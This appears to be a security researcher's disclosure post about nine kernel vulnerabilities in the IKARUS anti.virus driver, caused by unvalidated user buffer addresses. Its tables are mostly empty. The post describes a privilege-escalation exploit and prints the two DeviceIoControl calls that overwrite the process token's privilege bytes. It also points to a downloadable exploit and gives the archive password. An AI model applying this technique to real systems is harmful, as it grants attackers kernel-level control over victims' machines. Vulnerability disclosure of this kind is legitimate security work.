Here is a list of the 9 kernel vulnerabilities I discovered over a month ago in an antivirus product called IKARUS anti.virus which has finally been fixed. Most of the vulnerabilities were due to the inputted output buffer address (Irp->UserBuffer) being saved on the stack which is later used without being validated when using as an argument. The table below lists the ioctls, related CVE and type of vulnerability
|IOCTL||CVE ID||Vulnerability Type|
|0x83000058||CVE-2017-14962||Out of Bounds Write|
Fixed version numbers (vendors advisory
soon to be released)
|Vulnerable version||Fixed version|
I’m exploiting the vulnerable subroutine used by ioctl 0x8300000c by overwriting the _SEP_TOKEN_PRIVILEGES structure where arg_20 is our inputted output buffer address.
In our process _SEP_TOKEN_PRIVILEGES structure I’m overwriting a byte in the “Present” field and a byte in the “Enabled” field with the hardcoded value of 0x11 by calling the vulnerable subroutine twice.
DeviceIoControl(hDevice, 0x8300000c, NULL, 0, (LPVOID)PresentByteOffset, 0, &dwRetBytes, NULL); DeviceIoControl(hDevice, 0x8300000c, NULL, 0, (LPVOID)EnableByteOffset, 0, &dwRetBytes, NULL);
The exploit can be downloaded from here [zip] (pass “ghh”) or from Exploit-DB when it gets published.